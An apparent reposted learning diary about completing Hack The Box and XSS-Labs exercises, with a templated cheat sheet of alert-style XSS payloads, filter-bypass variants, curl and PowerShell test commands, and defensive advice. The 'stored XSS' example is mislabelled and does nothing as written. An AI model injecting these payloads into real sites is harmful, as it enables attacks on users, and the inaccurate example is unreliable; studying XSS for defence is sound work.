Today, I started by completing the Cross-Site Scripting (XSS) module on Hack The Box (HTB), where I learned all about the three main types of XSS—Reflected, Stored, and DOM-based—and how to exploit and defend against them. Then, I jumped into the XSS-Labs to put my learning into practice.
From Level 1 to Level 10, each challenge felt like solving a mini puzzle. At first it was pretty straightforward: just inserting a basic `<script>` payload would trigger the alert. But as I progressed, things got trickier: bypassing filters, closing attributes, using pseudo-protocols, and even encoding payloads. Levels 8 and 9 were particularly challenging, but also incredibly rewarding once I figured them out! Afterward, I wrote detailed write-ups in both Chinese and English, which really helped solidify my understanding.
- (CN) CSDN: https://lnkd.in/ggUqQtGj
- (EN) GitHub: https://lnkd.in/gwC5YTKN
You Should Know:
1. Basic XSS Payloads
- Reflected XSS:
`<script>alert('XSS');</script>`
This is the simplest form of XSS: the payload is sent in the request and reflected back unencoded by the web server in its response.
- Stored XSS:
`<script>document.cookie</script>`
This payload is stored on the server and executed when other users access the affected page.
- DOM-based XSS:
`<img src="x" onerror="alert('DOM XSS')">`
This payload fires when client-side JavaScript writes untrusted input into the Document Object Model (DOM) of a webpage without encoding it.
2. Bypassing Filters
- Encoding Payloads:
Use URL encoding or Unicode to bypass filters:
`%3Cscript%3Ealert(1)%3C%2Fscript%3E`
- Using Pseudo-Protocols:
`<a href="javascript:alert('XSS')">Click Me</a>`
- Closing Attributes:
`"><script>alert('XSS')</script>`
3. Advanced XSS Techniques
- Exploiting Event Handlers:
`<img src=x onerror=alert('XSS')>`
- Using SVG for XSS:
`<svg/onload=alert('XSS')>`
- Bypassing CSP (Content Security Policy):
Use JSONP endpoints or unsafe-eval to bypass CSP restrictions.
4. Defending Against XSS
- Input Validation:
Always validate and sanitize user input on both the client and the server side; the server-side check is the one that counts, because client-side checks can be bypassed.
- Output Encoding:
Encode output for the context it is written into (HTML body, attribute, JavaScript, URL), for example with libraries such as OWASP ESAPI.
- CSP Headers:
Implement Content Security Policy headers to restrict which scripts the browser is allowed to execute.
5. Practice Commands
- Linux Command to Test XSS:
Use `curl` to submit a test payload and check whether the response reflects it unencoded:
`curl -X POST -d "input=<script>alert(1)</script>" http://example.com/form`
- Windows Command to Test XSS:
Use `Invoke-WebRequest` in PowerShell:
`Invoke-WebRequest -Uri http://example.com -Method POST -Body "input=<script>alert(1)</script>"`
- Burp Suite:
Use Burp Suite to intercept and modify requests to test for XSS vulnerabilities.
What Undercode Say:
Cross-Site Scripting (XSS) remains one of the most common and dangerous web vulnerabilities. By understanding the different types of XSS and practicing payloads, you can better defend against these attacks. Always remember to validate inputs, encode outputs, and implement robust security headers like CSP. Keep practicing and exploring advanced techniques to stay ahead in the cybersecurity game.
Expected Output:
- Reflected XSS Payload: `<script>alert('XSS');</script>`
- Stored XSS Payload: `<script>document.cookie</script>`
- DOM-based XSS Payload: `<img src="x" onerror="alert('DOM XSS')">`
- Linux Command: `curl -X POST -d "input=<script>alert(1)</script>" http://example.com/form`
- Windows Command: `Invoke-WebRequest -Uri http://example.com -Method POST -Body "input=<script>alert(1)</script>"`
References:
- (CN) CSDN: https://lnkd.in/ggUqQtGj
- (EN) GitHub: https://lnkd.in/gwC5YTKN
Reported By: Lixinlovestudy Day – Hackers Feeds